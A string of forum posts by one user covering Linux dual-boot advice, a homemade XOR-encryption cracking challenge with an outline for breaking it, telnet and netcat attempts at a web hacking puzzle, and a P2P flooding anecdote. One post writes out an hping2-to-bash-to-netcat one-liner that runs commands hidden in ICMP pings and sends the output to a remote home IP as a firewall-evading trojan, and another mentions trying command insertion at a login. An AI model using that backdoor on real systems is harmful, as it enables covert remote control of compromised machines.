qwijibow

there is no one answer, except whichever way suits you best. Some like binary methods like RPM, slackware-packages, APT-GET, Yum, Potrs, Debian packages. some like to compile from source, with tools like ports, or portage emerge. and some like to just compile from source manually. it all depends on your personal preferance, and distribution.

Xoring a full byte is just like Xoring a bit 8 times. the ascii code for A is 64, B is 65. http://forums.xisto.com/no_longer_exists/ so 'A' = 01000000 'B' = 01000001 'A' Xor 'B' = 00000001 or 1 in base 10 decimal. a non human readable ascii code, but you dont need ot know that. if you look up the function for Xoring in my encryption program, you will see it is char Xor(char char1, char char2) { return char1 ^ char2;} all you need to know about Xor, is that it works the same forward and backwards, but i mentuioned that in the first post.. Data Xor Password = encrypted data. encrypted data Xor Password = Data. lol, a little over confident in your abilities,, hehe. did you ever get visual basic installed and have a go ??? if so, how did you attempt to crack the encryption ? how far did you get ?

Naa, i probably just didnt explain it too well.The theory is this, take the html web page as a binary file,a long string if ascii codes.each of those ascii codes has been manipulated to make it un readable.in this type of encryption, Xor logic is used to manupulate each bit.Xor is the equvalent of (A or and (not (A and C))see the first post for an Xor table.so, Example... is the password was "S M I L E"each top line character is Xored to the character below itT H I S - I S - S O M E T H I N G - T O - E N C R Y P TS M I L E S M I L E S M I L E S M I L E S M I L E S M Iand the result, is the encrypted file.to de-crypt it, we need to find out the password.one method would be a blind brrute force, systematically try out every possable password untill one is found that correctly de-crypts the file.this is slow, but easy.. it would probably work with this example as the data is so small, and password so weak... but its not a very intelligent method.we need to optimise the hack, and fortunatly have a major advantage, there are 256 values in a byte, a byte can encode the numbers -128 to 127. And only approxamatly 60ish of those characters are Human readable.A-Z a-z 0-9 and all the symbols like !"£$%^&*()_+~One method to hack the encryption would be as follows...Assuming the password is 5 characters long...1) Make a list of all human readable characters2) Exclude from the list, all those characters, which when Xored to the encrypted file's 1st byte do not produce a human readable character.3) move forward 5 bytes in the encrypted file4) perform step 25) goto step 3, untill end of file.the list of human readable characters is now a list of all possable 1st passwrod characters.perform the above step for each of the 5 characters in the 5 character password.The above method will work on any encrypted plain text file.this is the mehthod i used.because we know the file is html, we can firther optimise the hack.we know that there will be a "</html>" or "</HTML>" very close to the end of the file.perhaps a faster method of cracking this encryption would be to start at the end of the file,and making a list of 7 characters which are all human readable, and can be applied to the last 7 bytes of the file, which when xored will porduce one of the above html tags.in other words, if you Xor the string "</html>" to the correct address (where the encrypted html tag is)then the result will be the password (Xor works both ways, there are 3 elements, password, data and encrypted data.Xor any 2 of those emements together, the the 3rd element is output..so we KNOW the encrypted data.. we guess that the un-encrypted data is "</html>". that is 2 elements,the 3rd can be given with the Xor function... providing you xor the correct position within the encrypted data... Trial and error will find it, we know its somewhere neer the end.the probability is insanely low that it will find a false posative.then move back into the file, to you are 1 byte from the end of file and repeat.then move anouther byte in from the end of file and repeat.keep going untill a string of 7 characters, all human readable is found.if the password is smaller that 7 then all the password will be revealed (porbably wrapped around itself, trial and error can be sued to find the passwords true start and unwrap.if the password is larger than 7 characters, then you will need to apply the above method to find the remaining few characters. but performing this step first would have serverly reduced the amount of work the first method would require.Basically this form of encryption is like this math problemLET A = 12 and B = 9C = A + BC = 21.so C = A + B.but what if you only knew C (encrypted)and you needed to know what A was, without knowing B.21 = ? + ?mathematically, you cant work out the origonal values of A or B.so you need to look for patterns of expected output.Being a computer science student i suppose i just assumed everyone knew what Logic was and how it worked.maybe i will release anouther cryptography hacking challenge, after reading this one it shouldnt be too dificult.

Well...I must have made this challenge too hard.Like i said, this challenge is not about what you know. but about logical thinking and problem solving.there are many ways to hack this encryption...i have written a spoiler, and a pattern searching program. i will add them as attachments to this post.you will kick yourself when you see how easy this is !!!so if you like, take a look at the spoiler, and learn how to hack Xor encryption and impress the girls

Linspire is linux. it uses a wndows emulator to emulate windows. Linspire is linu, dressed up to look and feel like windows. i just dont like it, it goes againsed alot of Linux's ideals and goals. That tutlorial link seems a little out of date. it stresses that you must not install grub to the MBR, personally i would recomend installing grub to MBR. are you using NTFS or FAT32 for your windows disk ??? if you are using fat32, you can resize the partiton with many tools. if you are using ntfs, then it will be a little harder. i would recomnd booting a rescue disk, partitononing the disk, then re-installing windows. you need 3 partitons, a windows partiton, (approx 49% disk size maybe ?) a linux root partiton, (mmaybe approxamatly 49% disk size) and a swap partiton to be used as virtual memory, between 512megs, and 1gb) this time, when you install widnowsXP you should definatly see that screen. maybe you missed it ??? but it definatly comes up.

LOL, that was probably the problem..HTML and HTTP... there related, both 4 letters long, and start with 'HT'i must have been confusing them.Ohh well.at least i learned some pretty cool packet crafting tecniques

hmm, strange.. it worked whis time....were any changes made to the server ?

Great, your willing to format windows, this makes it much easyer to setup dual boot. (windows is crap at re-sizeing its own partitons) when you are installing windows, w#there will be a section asking where to install windows. it looks like this. http://forums.xisto.com/no_longer_exists/ use this menu to delete the partiton on the disk, then create a new parttion that does not use the whole disk. decide how much space you want for windows, and how much you want for linux. for example, i have an 80 gig disk, 20gigs to windows, 60 gigs to linux, so i create a new parttion only 20 gigs in size, then format the newly created partiton, and install windows to it. then, when windows is installed, install linux. when it asks you where you want to install linux, select the un-partitoned space. Most linux distro's can set uo dual boot manually, if whatever distro you chose doesnt, it can easily be setup manually. What Linmux Distro are you going to use ?

Hmmm, seems i defiantly made it too easy.i wrote a c++ program that managed to looked for patterns.it correctly estimated the length of the password, then produced a small list of possable passwords.each password was ran through looking for a <html> substring, and boom, as expected only one password generated that html tag, and it was the correct one.it took 10 minuted to write the brute force program in c++.and the porgram itself took approxamatly 0.01 seconds to run.but then again, i have studdied basic encryption, so i suppose i had a huge advanges.. (ohh, plus i knew the password, i set the challenge up... LOL)seems so far only 7 people have downloaded the encrypted web page.and from lack of posts, i assume no1 is still trying.i will post the solution, along with some clues later on in the week.maybe m the only one who enjoys this sort of puzzle

and i still consider the firefox pluggin cheating :(i tried with telnet on windowsXP same thing.

LOL... its not meant to be strong encryption.glad to hear you have studdied encryption... maybe challenge 2 will involve single padded xor encryption, with a quantum random number source. lol.

In my country, it is legal to download an mp3 of a song that you already own.for example, i own a song, but i want it in mp3 format for my mp3 player.it is legal to download that song.this is exactly what i was doing using giFT on the fastTrack (kazaa network)its quite common for anti-p2p companys to put fakes on the network,but one German server did more than send me a fake, it also started a DDOS attack on me !!!i rarely have any ports open, and its jus a normal home computer, so i didnt set my firewall or intrustion detection systems to detect denial of service attacks againsed me, who would want to DDOS me...anyways, shortly after beginning the download, my CPU useage shot to 100%and accelerated from 1.0Ghz to 2.4Ghz.i say giFT was to blame, and ran netstat and tcpdump.several ip addresses of the same domain were sending me SYN TCP packets on my open port.in other words, a SYN flood distributed Denial of serivce attack.i had to hard block this ip range in my firewall, and a few minutes later, the attack stopped.has anti-p2p gone too far ???Did you know, that in holland recantly, a tax was passed on MP3 players, elspecially large ones such as the iPOD.he tax depends on the size of the storeage, but as reported on the news, the currently largest iPOD costs the american equivalent of $200 EXTRA !!!which goes directly to the record company's !!!!They make it illegal to download music,, But they make you pay for it anyway !!!!Guilty untill proven innocent !I dont steal music...but if they fined you $200 americal extra for an iPOD and assume you will steal... well, that just p1sses me off.hopefully, this guilty till rpoven innocent will nto find its way to England.

bash-2.05b$ telnet jipman.astahost.com 80Trying 69.50.168.69...Connected to jipman.astahost.com.Escape character is '^]'.get /challenge2.php<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>501 Method Not Implemented</TITLE></HEAD><BODY><H1>Method Not Implemented</H1>get to /challenge2.php not supported.<P>Invalid method in request get /challenge2.php HTTP/1.1<P><HR><ADDRESS>Apache/1.3.33 Server at http://forums.xisto.com/ Port 80</ADDRESS></BODY></HTML>Connection closed by foreign host.bash-2.05b$ telnet jipman.astahost.com 80Trying 69.50.168.69...Connected to jipman.astahost.com.Escape character is '^]'.get /challenge2.php html/1.1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>501 Method Not Implemented</TITLE></HEAD><BODY><H1>Method Not Implemented</H1>get to /challenge2.php html/1.1 not supported.<P>Invalid method in request get /challenge2.php%20html/1.1 HTTP/1.1<P><HR><ADDRESS>Apache/1.3.33 Server at http://forums.xisto.com/ Port 80</ADDRESS></BODY></HTML>Connection closed by foreign host. it spits out the html 404, and closes the connection before i get a chance to enter the Host: or User-Agent lines. what did i do wrong there ??? same porblem with netcat bash-2.05b$ echo "GET /challenge2.php" | netcat jipman.astahost.com 80;<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /challenge2.php was not found on this server.<P><P>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.<HR><ADDRESS>Apache/1.3.33 Server at http://forums.xisto.com/ Port 80</ADDRESS></BODY></HTML> kills connection before i get chance to send anything after GET if i try to send user agaent before get, then it just drops connection without any 404. is your challenge programmed to UNIX standards ??? where a newline is denoted by a "\n" or the old DOS standards, where a newline is denoted by "\r\n" ??? maybe i will try this challenge on windows next time i get access to it.

And that number doesnt even come close to the number of firefox users.All those gentoo users out there who downloaded firefox source and compiled themselves, all those linux users who got firefox in the install CD.i wonder what the actual number of users is ???

Notice from qwjiibow: Challenge completed by.... drum role....mastercomputers Hi guys, ive noticed that these web based hacking challenges are quite popular.so ive decided to release one.Its not web based, it doesnt require much prior knoledge, but should be quite hard.actually, no, it seems hard, but in fact is very easy, depending on how many clues i give away.infact, for those of you who really think hard about this, it bmay be too easy.. i dont know.here is the challenge:I have encrypted a random html webpage that i have downloaded from a random web-site.it is your job to de-crypt it. the encrypted page is quite large, believe me, the larger the page, the more patterns will emerge and the easyer this challenge should be.here is how the encryption works, it uses Xor logic.0 xor 0 = 00 xor 1 = 11 xor 0 = 11 xor 1 = 010100110 << data byte 01010011 << password byte11110101 << encrypted bytegoogle for Xor encryption for more information.This type of encryption was first used over 400 years ago by japanese warriors, and was broken almost 100 years ago by a mathematician with no computers, and the message was plain english, much harder to de-crypt than the structured html code.when you have broken the encryption, PM me, and i will add you to the wall of fanme.RULES:any software you use to brute force the password MUST be written by yourself. please include source code in the PM you send.Ive seen this type of encryption broken with just a graph of the occurances of each byte, so programming knoledge is not needed, but will be usefull. HINTS:all '<' characers are normally very quickly follwed by '>'tags such as <html> will be expected very neer the top of the html file.think of other pattern with html, andcharacters that should show up often.maybe the last 6 characters will be </html> which would give at least 7 password characters(no, i made such this tag qwas not at the very end... but it is very close) (plus, the password is quite weak, ive not dicided on it yet, but it will porbably be quite weak, less than 7 characters, who knows [ me] )if you look hard enough, you will find patters of characters.the size of the patterns, and spacing between them will give valuable clues as to the size of the password.the file was taken from a Unix server, for those who dont know, in Unix, a newline is a \n character (ascii code 10)in windows, a newline is both a \n and a \rso when you have sucessfully de-crypted the file, viewing it in notepad will probably show the document without new-lines... dont worry, its just widnows beeing annoying. the source code of the porgram i used to encrypt the web page is added to this post as an attachment.you dont need it, but it may give a better understanding of how it works.this is vry weak encryption.when compiled as the porgram xor.exeuseage:xor input_file output_file password.because xor works both ways forwarsda and backwards,running xor on a plain file wil encrypt it.running xor on an encrypted file will de-crypt it.the encryped file you need to de-crypt is added as an attachment to this post...as time goes on if noone gets it, maybe ill post some clues...or maybe i will assume that this hackers challenge is too hard, and late it fade into oblivion..or maybe i made it too easy, lol.(this IS easy, it just looks very hard, especially when you first look at the encrypted file with notepad.)

thats nothing... have a look at these consoles (just plain connsoles, X is not running) http://forums.xisto.com/no_longer_exists/ http://forums.xisto.com/no_longer_exists/ http://forums.xisto.com/no_longer_exists/ anyways, glad to hear it all worked.

it drops me BEFORE i can finish telling it what i want. how do you keep the connection open ??? http protocol says you need the GET first, then any extras like HOST: User-Agent: etc etc etc the first tinme i hit return, it spints out the html, then drops the connection.

Iv us wget almost evey day.... how i wish iwould have once read the man page and discovered the host spoofing !!!!!well... i suppose i just like packet crafting too much !

LOL.. i hate PHP.when im tinkering around with CGI, i tend to use bash scripts / java / native c++ compiled code rather than PHP..you probably think im mad..[joke]maybe we should agree on a secret code, like "Bannana Pie"If that word appears anywhere in one of your future channelges, i know it requres PHP / SQL[/joke]LOLohh, and thaks for this clue, it would have killed me it i never saw the end of the challenge.. even if i couldnt do it myself

how did you get through the first step with telnet ??ok, its obviouse that you need to pass a "User-Agent: Mozilla FireFox 7.77" and ofcourse the "Host: jipman.astahost.com"but the serber always kills off my telnet session the first time i hit return, it doesnt wait for more input.and \r\n dont seem to be interpreted as newlies by the serrver, they aprear in 404ish server responce.to get past that phase i had ot go hardcore, and capture handshake, and http packets, modify them, then write a little script to send them, and packet sniff the result.Like jipman said, you dont need firefox to complete the first stage, so im counting the pluggin as cheating :Pso how did you do it with telnet ???Ohh, and thatks for this challenge... ive learned soooo much about hping2.did you know that you use hping2 and netcat to penetrate firewalls !!!for example, you could setup hping2 to sniff icmp ping packets.. EVEN if the ping's are blockked by the firewall, and dissables by the kernel,, AND spoofed the from ip adress,hping2 in packet sniffer mode will still get them.you can set hping2 to sniff for icmp ping packets containing a secret key.you pipe the output of hping to /bin/bash then pipe the output of /bin/bash to netcat which will transmit the outpu of the command back to you.hping2 --listen mySecretSendCode --icmp -a Spoofed-Ip-Address | /bin/bash | netcat youHomeIP 80the following will runand code emplanted in a ping, aslong as it contains your secret code, then send the outpu of the command back to you, on an innocent looking ttcp port 80 !Untill today, i thought a statefull firewall dropping all unrelated,a nd unestablished, and new packets would protect me from a trojan.how wrong i was...

damnit... stuck on the login...this better not need SQL code injection, cos i suck at SQL aswell as PHP.ive tried some good ol Bash insertion... but im pretty much stabbing n the dark... | head -n 20 and all that.cant you write the answers upside down on the bottom of each [age like they to in the newspapers... i NEED to know.

okay.. now im obsessed !so.. the server disconnects after the first transmittion.ive tried to put the whole reguest into a single transmition using \r and \n escape sequences, hoping they will be interpreted as a newline by the server. they are not.so captured the 3 important packets in an http request. using ethereal.the first packet is a SYN packet, the second packet is a ACK, and the 3rd is the actuall http request.i modified the 3rd packet to report firefox version 7.77, then i sent out SYN packet, when the server responded i sent the ACK packet... THEN i transmitted my modified http packet.so as far as the server is concerned, we have just dont a handshake, and sent a request...but the reply tells me im not inbvited to the party.At this point, i decided to cheat...i downloaded the firefox pluggin that automatically spoofs the user agent, i set it to spoof firefot version 7.77 and im STILL not invited ot the party...have you managed to pass this test yourself ?im hoping you set it up wrong :Potherwise.. i give up.

this is doing my egg in !!!last time i played this game, i just used telnet.and fed it a special html request.but this server is beeing annoying, it closes the connection as soon as i enter the GET line, before i manage to pass the Host variable.. and therefore i get a 404, because its looking on the main Xisto folder (same ip address and all that)ive tried passing the keep-alive part before i start typign out the GET. but that just kills the connection without any retured html code.i cant be botheres to re-compile forefox, so now im trying to make sence of hping.agh !

Excelent ! i like these types of problems...The only question is....Should I re-program firefox to report its version as 7.77or should i do some tcp packet crafting.thanks for this...(although i AM supposed to be spending today teaching an artifical neural network to predict changes in the stock market)AGH ! my coursework will never be finished!

So now that challenge 2 is out, what was the solution to challenge 1 ???Will you be releasing any non php specific challenges ?im goot at those.. spoofing browser refere addresses and such with packet crafting software... (hping2 rocks, any1 tried it ?)